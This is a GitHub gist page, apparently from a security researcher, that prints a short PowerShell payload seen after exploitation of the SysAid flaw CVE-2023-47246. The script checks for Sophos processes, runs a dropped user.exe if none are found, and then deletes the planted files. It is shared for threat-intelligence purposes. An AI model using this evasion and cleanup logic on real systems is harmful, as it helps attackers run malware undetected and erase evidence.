-
-
Save JohnHammond/96dfc3179f8a6b043383f019a9be6f99 to your computer and use it in GitHub Desktop.
Observed initial PowerShell payload following CVE-2023-47246 exploitation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$wapps='C:\Program Files\SysAidServer\tomcat\webapps' | |
dir "$wapps\usersfiles" | |
$bp=0 | |
foreach($s in tasklist) { | |
if ($s -match '^(Sophos).*\.exe\s') {echo $s; $bp++;} | |
} | |
if ($bp) { echo "`nSTOP-PROCs FOUND! Exiting`n" } | |
else { | |
echo "Starting user.exe" | |
& "$wapps\usersfiles\user.exe" [REDACTED_HEXADECIMAL_VALUES] | |
} | |
Start-Sleep 1 | |
Remove-Item -Force "$wapps\usersfiles.war" | |
Remove-Item -Force "$wapps\usersfiles\user.*" | |
exit | |
# |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment